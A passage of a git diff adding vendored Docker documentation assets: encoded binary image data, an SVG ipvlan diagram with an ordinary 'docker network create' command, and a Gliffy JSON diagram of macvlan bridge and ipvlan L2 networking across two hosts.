z#DwD6gpTc4zz+kj!7D{9vADZx**ku@&1Dh^vau4`aBsh2fM1-u+iJnet#27HXt0=yjrZf_2bdD{3u0wb1 ztk`VS+>C=nKm@mGQN$~|q%BT9IpW2_ma-laOSD1cW5eAtMxF~NX`&b=y?39O5!V)yk*YUvpXP;-ot zp3XYt^|@o@^!JC(;w8$X7uU!_Z=qk~1gPZ_p6SY63< z-Z5cBjpCHm^%bGrd+%^>m%+Ey)TNbp+o(t3zs8x?f#xPncu37YNd~SIgFY{F$8W22 zn^@u9pNUw1c~;Dzdg*pQQ$76{{X5R@-U$9#HuGkriW#`A~*vshU#7Z zbX?V($VC4>nR04uLJ&LfcFwx^-=S1yC`I^&Pp_{2#NRj@w>_V9;u9fSNUga6heP+mrf=TB-R7JO=w;_ zzhdVV@Tl{l`|E@v3Cb6ExgFu)!Jyi|OIFapuhNF#6S5o(-b!p*-wyr3Tyio({~$l} zCz;NR(U(s$EppiT?MsvYrl-}?CGz-ZDaMC3b5zLNM5r=nx8v2iA;wK^*>I+KRKe() zWhSc+azN zyPPrUXx~AJsk34(T885e&2hgYseccc`*+-?2Fs#S0gLlUqdpWCf|boccW!7GQ1_U z1hr32NThsRGG|^}I9g3ZV`!FqLnZ&=MGDWXc*bqPGU>~RG@&tG{`9m5j5X}-$;xnR zmnNj+^|Q9sFA?5$3zKMy`n*BVzZ5X97##Ra_#bP$Y3}qPuP6F=Sq?)Vt-(CIC#KN5 z(x3Za=uloqyq%ZFXC%?{ssH{aK~3Y@`6R#R zc2?ovyuPvGP5Yu|rRO4gj#eo#R1@Hs^j3a%b`{^LD8YSpL5a1YQWfnB1zrI5^1aRgrX1`-0#0 z@?^eE6Xy1xNP27H6A|AoYiVf-R{@9*dAE)G7C(U(6IfqN9@gP6?&3Tx)8$M{_t#kc z_+1c1>W}{0E_+58F~{^6s>XFT*GEU1VgdYWvmGYU{#7ak&gr7u8~kCQpQaqsE#~pGnDU-zx%p2coe&^WxpC^{J8yg>iUcB z%7KQjsT?Bqdlr`&9xqW?QAb=F-~Fo>p?tUcAn#FZ%zHfHa75l%zM}?u=B`eQLBl``W8T#~K}l2*i);+X6tjk1od`E<Y=KV3#P-k7eqGT4vqwhBlo65 ztTaME%Y#Jh8FkdQJSCx#Hr{%JIXeBPR7JPYBK2Jl#-%6PY5G~ph}q1Wt?czkwS`X{ zyc6%}J&qC-5yAmc{s#k1o`37J4Xe|z&0j{^Wbsn}T(zBQ-+Ay@YOPaH42kKAZQ&~o zB;#$xe&4N1i)V@I25-gNut0?(nZyyoHsN*cK3%6vsLeQdDv^v`n3=ihh{qwe2X-y+ z|FzN;nV|12mLS?6gb7Nm;H%};AHZnUJYw6~Ak#~YsV!^wU)p9i(c;2-41MTa>HF@U zb|^cRS!3_pl~O{)sndA!Gs>b5d+xKweeuF;Mp*FzY9WX{^~bLnFzN&Eyo??MJ1CIW z)+_Lb4_dgOBTwXzsqGPs-Rn1hlBQSq#x(L?H}XiEh<^&NuH^7bVU_2$c%Lf=rdmp3Ika3ZNCpvIcWJ>I;p2pp4KJ*Y$bb5iMrlIp-YpUQ-XPY< zVsD;u#DWo`$DmhnSi+;|o5sRgY-d$gVu&8I6~imjCdd2~-T-1k59YaGA&iaHIi)8SWJp6&U?3zxQ1yobk<|N-nQ1@dcLG>1g#7Lk$$dV7a4riS zs>4Lzu_K-6tmmAPPXBEKlk0x^yd4W-isCyB$!GCO@vaYg+0aDT@fI)NvHW!XA7(0O zL!G1qYjm@LGk1*sHw$`UO3h00EEth@TUG(p5`PLNevikg7>4$TVq+^&&`#BYx^9O}}Dq{44aJB916HfW>L&MNk!s)l$m9J4V|-Yjd2Usct1c*rDSyF z8J#b$#-xF7lKcFs$@;E6d{7&ZWkLp|c*1^iFZew;q;1E8r39VGtvpq1!O;q59g-EM_5M5wJ&jy95n3e11Bjc+k%xM~pQm4C;D9XpYL z^zkQhvUO1=+S^a~@*MMXU(6^8QQ_}bWszEHHs2mlU?DB$hnTbZNvl_Y^{5tmf_kW7 z7>PD>P|{RpgiOT=f`4xi$L>O{N~$sp?L&)Phg>H%Xj+-b>4(QIgl*oh9FvxZmlx=I z?Uki9PNg&Gs%X*JS7fAzIUEVc6U@EnG7n{XI+SSSojGM>U>dA9yO$6a4*Qq)&8XB> z$9LT%ZlUkovhbG!Uf2Z$$|El>$JtN>f#bCMWUTop5^VCCKN_#;98u-Qzf(q>r4UR1 z)mHJyRTTa0HPtjfHZt6Qf|2~O>#xC)uqyq*lkW7O&$F*$B8HKnQsSnoiO(MJPDNmW zXXV$3TkYN3qkZ^lu&f#%#gN|Is@cV|tbrAx*TBWamFItnJT*?UKUf#?q0kh{_H=*W zMvb5p%Y}uYRt_-5e|rc5DAlW+XY=FgYW5nV z>+tU`KO&)l9xAHYuw(I(rp4zVZ}y6}XE1c$hJEF$M<2&Q_O+Oso6}t`2_5js+?WD; z2r)vtP-X%_iA*!^>!RCJD-O_vypBKbr0Nk$?P00TaXSz~|=(@*#;%gqky z)Kv8hX8FEZk=v#vYx1k_F;t1kd@(keVNT3UEMf2P#U zF6jI`E?gig`BmUU)wh~r5DN}_3Up*M3WuI>+1#B_7woHJL1}Jnk*es@^USNzTNT6h z=N*c+xTK_H1voS`R2vo<8Mz#Qjg74dq@_*6QQmr8>aZ{|@;n*4lisAb2Xuq!(0CZ_ z8L6>kG~}feh>PX5aj|@XUnFyL^RNvxjD?G7i1(r%X=}EP+FUn+7js!$&YIhfY64CL z+x_xRsL06Jpg37^hzPr8pZ)Bn0j;c*=7V>`l&+-kJR5&>hr>I(3VUj_csveGTCSez z+>Hf?&@i54Kzz=u6QP4Ri(O_@9zL!|>6zhQ!8OaJDk%W&G^rh0qe!RwFTGZb6|Z){|6HO0lno z_-RWgnH#>kQU5)Ji7Uw7c6qY3>+@5cQRFwJ2K0Dw!cyeL>YX(Nr5|aggseJoPnQuW zDDtcLf^<)D=Pg+$MNK0Xi^&eIAH{5QF@yBZM-9N{0YuD#P3x*TOs;~3nh6m6$*cK& z&9K`5=9>)tP3wb6L&t9E<%yNzpm3W|7i+tg0*{Z^^801*SFx1uj}8YFwj1h(xR|yq zON-+tRS6c7#x|2wb)VLnsd>Q@*h%W$Bn^|rEM_dJI@MY?Rurq&YY3?@QR>cztxq`qR!X0xEi4w z1ZH~?=0G?)ieKqxuZV*f+I}y}$6xV0Je30Pr)gnefX97=q&%OuV%=mp1MKOt=g&RO z2u>v>)?;mT%BC)(P;@fXhB)GgTsF(7&G@ieJ^uJETKAkNks!L=(bSMeNNPk>kb7-q zeae=F{aU2IYSGMu2pM6I_Z&kq&C!k?3|$J<*npK@v>=4TXEw4 zKNc2K^j-Zy!zaxrc~Aw{e9_h3<#nD-;w&7&qRXGLZTf3mxkdLSoNw1N`tL1@3c8#oY zg3t3_PY>%}g;8+#FC)t02H^-fe#REeOti3|FnBq;+rDZ{R?qhT1-F_jwfOlv2xTZ+-Q5bkc}5Rj=YJ(kfT^WMiLmwaxlXw1X~SQaIquj6l%# z$*_!JtuSpLwk-+y{UxD^G+S|wX#FH@m=|OA?iNC_?F#$Skc56=*8ShUUFGT6h_%h3 zDuW+X(^+hcD`-^2oBB zED1w>$or-H8^9bPN(hqe@J4%M4Nws{27yY|*jxlrE)++tg3=2+JbzZ2Ht-15TzK2( zEq@uGva_@>V@*r=f#R=^#tFA#S;+~JCLezy#kdhPvTm=@ZAard>^n4z6qqcAIr~g_ z#zlSVwb9|mvC)lKK8gH<45w_q2$fRdOU>ZG%?fwY1k)=DIMr@iid2LJV%i*cvHJxC zeK-iiNwsjoCc9#5IWhHip{oDWoEzKd$WoG{m^-&B@+J*vHuEXhEED z?|T86vw&w*or*ZAt83}swy@B_|5L@4heN@2@iB+lyphifqZgWQiDiWG7T8 z`#xoC*(Qx8WNT!X$Yh%g4GmdJV;}n(2H8S=qxX;R`|h9TxxahQIrp63xzBT+=WO=Q zvv&xkTVy$y2nDO7>hr(8kj?NYZD5}*E(}&iqqr>BZQ{l-<4a|ZLzRzN`e|QDzCgw6 zfaMiSn!lqWoAY!Rog+XkrjUS?%ah~rWqZN{^AZWtEs-h$=E$*ep^NvYb}u!eHgLjl z{IRL(gGx$XK1gG!i_vv3rw?jw(0%yz+=9LHr{&*^N*uX82v}xIFilM3EqE#Ex_W4P z42NiqPMkynkB`8mg*LM~Cd9L8X8-v#;clUNVMJsUFLrmG$>g@t-Q(RLtt>j0 zz!E`aE|&d;%2fEwG`Y7S27mk{%Ej!}8I$ADwDz)&CvepPARixJ0j*klw1HqLiaLz* zu$|mTqo7W7AJ})o+B`9L53V0O$*IzmZ68%Dbp~8kk>pQmK-R>Fo7=$|wW=)mcnNEX z>TF#uy8Y$~Vt(ohZd9CJ)b6o**~|?SuF4B4ul}C80!~_3Ujr2*?{(!fjSjobZm&5~ zJC1vPed|ZaULhXuN^`*yK0CYn=B#1w6>oKqS+kdSOOWb9dlLjuw&-)R@h#9y)D{gU zW0NLSpF6K|)Xljy0ay}!EaWCFnNqC{*3O+N1Jeq-gekxBj6F!KmdH&0^>9H?hFgTG z!;ODkzV#q=_^Q11$Kr{;nJ>lfyp7DnmQWJ=N#oqo2t;QslVI5Ji2?o}na>QCp@T#V zE69-}5-}tT9hPod_#wgw& zDk*mX;;kBl4Sl)0bO;`w!1Fxbnt752v~PYN%)Z7$>I2P~==T<39(;w5N9(v3WIkmW zd59mlO}#Lz&mZF5o_1Saa?i;A;~6E|(~rvlZV)Bw-t^v_H)E4eu@!t>dDZS+`FE+t z_OhJ-jR9Z>_-<A32giG6D81%G&( zRCAgWi$9i+g-%x_`00^VV7b7zsW-YV`Mf#*1REgaT+!4Ryu^By*bsYkwdcq|pf!iV z7am3P(0ku(1#X-A4OHIQ%8M^b*rV=_67D2WU1vD4y8B3Z;o;8#LIj7kG+5-x&K+O3 zH8!NdfWP}KlT;&Xo@HjyAn=hiLrmu_sm$A_6N5@p#^a@7n11aWHs$hT3#-@?FCB(x zj8Fn3swk#Zk7YotnXl<$P~Is{!cRoT1jX-4l}(eC$BWIS?URCyWfF|LZ0+a#fAJ;i6MTs z2Q&}r{8_BXkVcz<19BRgENIV zybHBb4)gL)Qb>;N-i`i#D{k_u!9|eNiNu5H{mf|@1K-jqn0m z_1xEkjfz@j{&L|h$U?(v-m&(p9$rsHu892_Yc2@g($tEoe`6EoQ80uiFcnrRsHFuy z`1ekO+)nk8FdibDWB0x45%^w@{$!WtkT?5q2BTnh$-mH!+%}X~bkijH$PS0M#oC{z z==v~Ms~TwhA(`apZZqTa^2DIJDLIAx$V$KB_v~)yQX5);1Eyok`VkvmFiBqhFRpy% zQ+4Z)?GGtpYFvk_8>Ug;x0HbJex+umjl!_4SRf0HzQDKBpa9(RJ*FuoYoE3(inCc# z+%Knz9vYVG|FBj$8gf7a-ZB?oA0gaoJD9=T1sXeV`z^%Z8i9Q9pKNqgU9p`Ja$QY+ z2kj`#6k|MRtzno5!Xe0|Y8Wd}EsBX|!aA1; zo+O^W9QW8a#8Il?W+-QS8wfADdFkCioB-boKcPGHGDjrlkY(!|=G#L47oLntB&ad8 zdJfh%-H!`F)_%Rya`|T9Acr2w}sk15+(1H z=E^P#LrFjL-*YYN|3Fhy>)7EA|UOxZ=LwLZUJ;8NyHp6N@5M+40)g1xpq)1b#0CaR41Yb znbX*_ismgYzu4FFOfY%r63M%p>N!iTh`6uuiW@4^gZJk#F1v$8X!JDx;5x(B1aw^B ziv!@%#~}@6r?BJH8Am7P9M|}3rsl54YzxNO@cn5>3Ln`d!;SwRHE21Tk^1x~Pgs*EnrW>_iT99xEcEPiiYM8oqJ9GBrt| zbUs@Lx-}L7tKmRYcontainer1192.168.1.2/24container2192.168.1.3/24pub_net (eth0)DockerHostdockernetworkcreate -dipvlan \--subnet=192.168.1.0/24 \--gateway=192.168.1.1 \-oparent=eth0pub_neteth0192.168.1.0/24NetworkRouter192.168.1.1/24 \ No newline at end of file diff --git a/vendor/github.com/docker/docker/experimental/images/macvlan-bridge-ipvlan-l2.gliffy b/vendor/github.com/docker/docker/experimental/images/macvlan-bridge-ipvlan-l2.gliffy new file mode 100644 index 0000000000..eceec778b7 --- /dev/null +++ b/vendor/github.com/docker/docker/experimental/images/macvlan-bridge-ipvlan-l2.gliffy @@ -0,0 +1 @@ +{"contentType":"application/gliffy+json","version":"1.3","stage":{"background":"#FFFFFF","width":541,"height":352,"nodeIndex":290,"autoFit":true,"exportBorder":false,"gridOn":true,"snapToGrid":false,"drawingGuidesOn":false,"pageBreaksOn":false,"printGridOn":false,"printPaper":"LETTER","printShrinkToFit":false,"printPortrait":true,"maxWidth":5000,"maxHeight":5000,"themeData":{"uid":"com.gliffy.theme.beach_day","name":"Beach Day","shape":{"primary":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"#AEE4F4","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#004257"}},"secondary":{"strokeWidth":2,"strokeColor":"#CDB25E","fillColor":"#EACF81","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#332D1A"}},"tertiary":{"strokeWidth":2,"strokeColor":"#FFBE00","fillColor":"#FFF1CB","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#000000"}},"highlight":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"#00A4DA","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#ffffff"}}},"line":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"none","arrowType":2,"interpolationType":"quadratic","cornerRadius":0,"text":{"color":"#002248"}},"text":{"color":"#002248"},"stage":{"color":"#FFFFFF"}},"viewportType":"default","fitBB":{"min":{"x":2,"y":6.5},"max":{"x":541,"y":334.5}},"printModel":{"pageSize":"a4","portrait":false,"fitToOnePage":false,"displayPageBreaks":false},"objects":[{"x":2.0,"y":6.5,"rotation":0.0,"id":288,"width":541.0,"height":22.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":31,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Macvlan Bridge Mode & Ipvlan L2 Mode

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":8.0,"y":177.0,"rotation":0.0,"id":234,"width":252.0,"height":129.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":0,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#434343","fillColor":"#c5e4fc","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.93,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":16.0,"y":240.0,"rotation":0.0,"id":225,"width":111.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":1,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.73,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":2.2199999999999993,"y":0.0,"rotation":0.0,"id":235,"width":106.56,"height":45.0,"uid":null,"order":"auto","lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Container #1

eth0

172.16.1.10/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":138.0,"y":240.0,"rotation":0.0,"id":237,"width":111.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":4,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.73,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":2.2199999999999993,"y":0.0,"rotation":0.0,"id":238,"width":106.56,"height":44.0,"uid":null,"order":6,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Container #2

eth0 172.16.1.11/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":40.0,"y":-26.067047119140625,"rotation":0.0,"id":258,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":7,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":237,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":241,"py":1.0,"px":0.7071067811865476}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[153.5,266.0670471191406],[117.36753236814712,224.06704711914062]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":50.0,"y":-16.067047119140625,"rotation":0.0,"id":259,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":8,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":225,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":241,"py":0.9999999999999996,"px":0.29289321881345254}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[21.5,256.0670471191406],[62.632467631852876,214.0670471191406]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":60.0,"y":-6.067047119140625,"rotation":0.0,"id":260,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":9,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":241,"py":0.5,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":246,"py":0.5,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[75.0,180.06704711914062],[215.32345076546227,90.06897143333742]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":3.0,"y":184.5,"rotation":0.0,"id":261,"width":79.0,"height":32.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":10,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Docker

Host #1

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":283.0,"y":177.0,"rotation":0.0,"id":276,"width":252.0,"height":129.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":11,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#434343","fillColor":"#c5e4fc","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.93,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":291.0,"y":240.0,"rotation":0.0,"id":274,"width":111.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":12,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.73,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":2.2199999999999993,"y":0.0,"rotation":0.0,"id":275,"width":106.56,"height":45.0,"uid":null,"order":14,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Container #3

eth0

172.16.1.12/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":413.0,"y":240.0,"rotation":0.0,"id":272,"width":111.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":15,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.73,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":2.2199999999999993,"y":0.0,"rotation":0.0,"id":273,"width":106.56,"height":44.0,"uid":null,"order":17,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Container #4

eth0 172.16.1.13/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":315.0,"y":-26.067047119140625,"rotation":0.0,"id":269,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":18,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":272,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":270,"py":1.0,"px":0.7071067811865476}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[153.5,266.0670471191406],[117.36753236814712,224.06704711914062]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":325.0,"y":-16.067047119140625,"rotation":0.0,"id":268,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":19,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":274,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":270,"py":0.9999999999999996,"px":0.29289321881345254}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[21.5,256.0670471191406],[62.632467631852876,214.0670471191406]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":278.0,"y":184.5,"rotation":0.0,"id":267,"width":79.0,"height":32.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":20,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Docker

Host #2

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":70.0,"y":3.932952880859375,"rotation":0.0,"id":278,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":21,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":270,"py":0.5,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":246,"py":0.5,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[340.0,170.06704711914062],[205.32345076546227,80.06897143333742]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":167.32131882292583,"y":39.0019243141968,"rotation":0.0,"id":246,"width":216.0042638850729,"height":90.0,"uid":"com.gliffy.shape.cisco.cisco_v1.storage.cloud","order":22,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.cisco.cisco_v1.storage.cloud","strokeWidth":2.0,"strokeColor":"#333333","fillColor":"#434343","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":356.0,"y":150.0,"rotation":0.0,"id":270,"width":108.0,"height":48.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":23,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#cccccc","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":1.0,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":1.8620689655172418,"y":0.0,"rotation":0.0,"id":271,"width":104.27586206896557,"height":42.0,"uid":null,"order":25,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

(Host) eth0

172.16.1.253/24

(IP Optional)

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":81.0,"y":150.0,"rotation":0.0,"id":241,"width":108.0,"height":48.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":26,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#cccccc","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":1.0,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":1.8620689655172415,"y":0.0,"rotation":0.0,"id":242,"width":104.27586206896555,"height":42.0,"uid":null,"order":28,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

(Host) eth0

172.16.1.254/24

(IP Optional)

